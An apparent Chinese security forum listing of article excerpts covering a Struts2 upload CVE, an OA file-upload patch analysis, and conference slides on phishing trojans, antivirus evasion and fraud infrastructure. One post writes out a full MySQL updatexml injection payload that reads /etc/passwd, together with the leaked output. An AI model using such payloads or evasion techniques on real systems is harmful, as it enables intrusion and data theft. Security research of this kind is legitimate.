技术文章

Apache Struts2 CVE-2023-50164__

Apache Struts2 CVE-2023-50164________________________________________漏洞描述Struts2是一个流行的Java框架,用于开发企业级Web应用程序。支持动作处理、表单验证、拦截器,以及与其他Java技术的集成。Apache Struts 文件上传漏洞(CVE-2023-50164),未经身份验证的远程攻击者可能会利用该漏洞执行

2024-2-29 14:56 4 447

求助MySQL delete语句 updatexml报错注入问题? 求助大佬!

事情是这样的:被带入的数据库SQL:DELETE FROM polloptions WHERE polloptionid='146640' and updatexml(1,concat(0x7e,substr((select LOAD_FILE('/etc/passwd')),1,31),0x7e),1)-- +' AND tid='18'报错回显:XPATH syntax error: '~root:x:0:0:root:/root:/bin/bash'这个使用updatexml函数 报错注入

2023-10-7 22:16 12 5149

苹果系统ipa安装包导出求助

1、想要导出苹果手机里安装的app安装包,坛子里搜索了一下好像没有搜到类似的贴子,还请各位大神指点一二,很多不是正规app store里下载的app应用,我需要将这个安装包导出,或者应用被删除了不知道还能不能找到原始安装包?2、安卓系统被卸载或者删除的app,原始安装包是否还能在设备里找到导出?

2023-9-26 08:09 22 4146

某OA-前台任意文件上传

前言前段时间,官方发布了10.58.3补丁,其中修复了一处前台任意文件上传漏洞,实际利用条件比较苛刻,在此分享一下分析过程利用条件目标开启集群模式。漏洞分析第一部分通过diff10.58.3和10.58.2的补丁可以发现,在新版本中的补丁禁用了几个集群相关的uri通过分析,涉及文件上上传的有clusterUpgrade.j

2023-9-11 15:25 24 928

T00ls-2023深圳沙龙PPT:智能机器人在网络安全对抗中的实践(罗义聪)

人工智能与网络安全工作中面临与解决的问题面临问题:技术人才匮乏繁琐、重复性工作量大持续的安全对抗落地难缺乏易用的国产化平台解决问题:提供安全、稳定、持续自动化工作的机器人,提升3倍工作效率机器人集群与多模型的智能调度应用,提升10倍工作效率和质量智能自动化应用场景研发效率提升3倍

2023-8-19 10:37 0 3874

【重发】车联网安全-总线安全(一)

对于车联网比较陌生的小伙伴可能不太清楚总线是什么,这里给大家简单介绍下,总的来说就是车内各个零部件控制,通信的作用:汽车总线(automotive bus)随着汽车各系统的控制逐步向自动化和智能化转变,汽车电气系统变得日益复杂。传统的电气系统大多采用点对点的单一通信方式,相互之间少有联系,这样

2023-8-17 13:29 10 5566

T00ls-2023深圳沙龙PPT:高级钓鱼木马设计指北(3vilK4li)

普通木马Ø 快速上线Ø 执行程序的隐藏Ø 权限维持Ø 木马文件的免杀钓鱼木马ü 对应的文案功能实现ü 多文件格式木马程序ü 交互模式实现ü 木马体积ü 图标、文件名、签名

2023-8-12 23:58 3 5027

Blackhat USA2023:Diving into Windows Remote Access Service for Pre-Auth Bugs(@guhe120)

Highlights of This Session✔ Windows RAS VPN components✔ Examples of pre-auth remote bugs & bug patterns in windows RAS✔ Not only result but also approach & thoughts during the research✔ Windows bounty experience❌ Exploiting details of the bugs is beyond the scopeA walk throu

2023-8-11 11:22 0 3412

T00ls-2023深圳沙龙PPT:黑灰产对抗之攻击与情报侧降维打击(lego)

猫池:基于电话的一种扩充装备。接码平台:非法获取大量手机验证码,并提供给客户用于注册账户、刷单。发卡平台:自动售卖虚拟货物。GOIP:是网络通信的一种硬件设备,支持手机卡接入,能将传统电话信号转化为网络信号。

2023-8-11 11:17 3 4702

T00ls-2023深圳沙龙PPT:免杀之突破主动防御(2016)

主动防御简单来讲,就是一种针对防火墙、注册表、服务、进程、流量等进行监控以及对异常进行拦截的行为。突破主动防御的难易程度简单:• 360• 腾讯电脑管家复杂:• 小红伞• malwarebytes困难:• Defender(2022年11月15号,单层自定义加密和管道连接)• 赛门铁克,卡巴斯基(2022年11月15号,双

2023-8-10 10:39 0 3650